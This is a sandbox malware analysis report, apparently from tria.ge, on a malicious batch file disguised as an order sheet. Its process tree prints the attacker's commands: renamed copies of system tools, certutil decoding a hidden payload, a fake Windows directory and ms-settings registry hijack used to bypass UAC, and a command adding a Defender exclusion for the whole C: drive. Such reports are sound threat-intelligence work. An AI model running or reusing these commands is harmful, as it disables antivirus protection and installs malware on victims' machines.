Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

Order Shee...47.bat

windows7-x64

7

Order Shee...47.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    142s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    13/05/2024, 18:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Order Sheet#2084-0147.bat

  • Size

    3.1MB

  • MD5

    6625a9ac66586e588f4786cdbfaf2ed8

  • SHA1

    33c6c2cfc8e71d8a6187d110666f9c0c2decff03

  • SHA256

    c2e16be582aa7399bdb7b89cf72ba0f9bbecd5a128ad73d26ca0981963f83f5f

  • SHA512

    7ba8791d78fc3e01b69755fbf3d2569fe59ad0efcc4a87af88aa8cef4dbaf7f1715b4567631fcc119f735966d4791e737ee045d7966b51426fdef365e43278e5

  • SSDEEP

    24576:IFHMJaK5lhd5XfcIrAnYMEjS5W+DaunmO+RCNJXCP+I:IFHMJau/51rAnzQ

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 24 IoCs
  • Loads dropped DLL 15 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies registry class 5 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Order Sheet#2084-0147.bat"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1860
    • C:\Windows\System32\extrac32.exe
      C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
      2⤵
        PID:1928
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
        2⤵
        • Executes dropped EXE
        PID:2264
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
        2⤵
        • Executes dropped EXE
        PID:3028
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2564
        • C:\Windows\system32\extrac32.exe
          extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          3⤵
            PID:2660
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Order Sheet#2084-0147.bat" "C:\\Users\\Public\\Ping_c.mp4" 9
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2736
          • C:\Users\Public\kn.exe
            C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Order Sheet#2084-0147.bat" "C:\\Users\\Public\\Ping_c.mp4" 9
            3⤵
            • Executes dropped EXE
            PID:2604
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1648
          • C:\Windows\system32\extrac32.exe
            extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
            3⤵
              PID:2572
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1936
            • C:\Windows\system32\extrac32.exe
              extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              3⤵
                PID:2544
            • C:\Users\Public\alpha.exe
              C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2780
              • C:\Windows\system32\extrac32.exe
                extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                3⤵
                  PID:2724
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:2376
                • C:\Users\Public\xkn.exe
                  C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2436
                  • C:\Users\Public\alpha.exe
                    "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:2524
                    • C:\Users\Public\ger.exe
                      C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                      5⤵
                      • Executes dropped EXE
                      • Modifies registry class
                      PID:2672
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2704
                • C:\Users\Public\kn.exe
                  C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
                  3⤵
                  • Executes dropped EXE
                  PID:2556
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2828
                • C:\Windows\system32\taskkill.exe
                  taskkill /F /IM SystemSettings.exe
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1340
              • C:\Users\Public\Libraries\Ping_c.pif
                C:\Users\Public\Libraries\Ping_c.pif
                2⤵
                • Executes dropped EXE
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:1176
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 684
                  3⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:316
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
                2⤵
                • Executes dropped EXE
                PID:2364
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
                2⤵
                • Executes dropped EXE
                PID:1452
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
                2⤵
                • Executes dropped EXE
                PID:344
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
                2⤵
                • Executes dropped EXE
                PID:2240
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
                2⤵
                • Executes dropped EXE
                PID:1604
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                2⤵
                • Executes dropped EXE
                PID:1352
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
                2⤵
                • Executes dropped EXE
                PID:1244
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
                2⤵
                • Executes dropped EXE
                PID:2384

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Public\Libraries\Ping_c.pif
              Filesize

              1.1MB

              MD5

              3338081e5056970e3ce7ca7cd4f6edb5

              SHA1

              05bd7eab89d013783997d1e46903ffea69598591

              SHA256

              2b3cc2641089daadfd6f8292d8ec912d3b2a1746ae9961962c873e7ece07ba30

              SHA512

              3c101c367e6b74bc43eb5ad21b091483fccc1be2f7c8b297750682a531739a390a3cb81f5b0567ae031f85f54f9f0f2970c0ac1f0b5ff0969b23388be494aef5

              Download Submit

            • C:\Users\Public\Ping_c.mp4
              Filesize

              2.1MB

              MD5

              9662e6c3152cd084a64d2b87d2e5cf99

              SHA1

              213bb41e58324a7da5b86c1919c021aa280f8c5f

              SHA256

              52e26aa7a38ff24d5a91c3a0a5c8fdab46ec216ead28dc8c3fc8eb1ed91c0471

              SHA512

              61b64ced472220aa707b9e0dc96ac53f7e7bf6d7f6ac8f5a5b2e6edbc97dcc8fa91e38642d5bee9359bb23affde6f2393ee6a1520cb0bd13ca5e34fd62519ee9

              Download Submit

            • C:\Users\Public\ger.exe
              Filesize

              73KB

              MD5

              9d0b3066fe3d1fd345e86bc7bcced9e4

              SHA1

              e05984a6671fcfecbc465e613d72d42bda35fd90

              SHA256

              4e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e

              SHA512

              d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119

              Download Submit

            • \Users\Public\alpha.exe
              Filesize

              337KB

              MD5

              5746bd7e255dd6a8afa06f7c42c1ba41

              SHA1

              0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

              SHA256

              db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

              SHA512

              3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

              Download Submit

            • \Users\Public\kn.exe
              Filesize

              1.1MB

              MD5

              ec1fd3050dbc40ec7e87ab99c7ca0b03

              SHA1

              ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

              SHA256

              1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

              SHA512

              4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

              Download Submit

            • \Users\Public\xkn.exe
              Filesize

              462KB

              MD5

              852d67a27e454bd389fa7f02a8cbe23f

              SHA1

              5330fedad485e0e4c23b2abe1075a1f984fde9fc

              SHA256

              a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

              SHA512

              327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

              Download Submit

            • memory/1176-71-0x0000000000400000-0x0000000000517000-memory.dmp

              Filesize

              1.1MB

              Download

            • memory/2436-43-0x000000001B530000-0x000000001B812000-memory.dmp

              Filesize

              2.9MB

              Download

            • memory/2436-44-0x00000000003F0000-0x00000000003F8000-memory.dmp

              Filesize

              32KB

              Download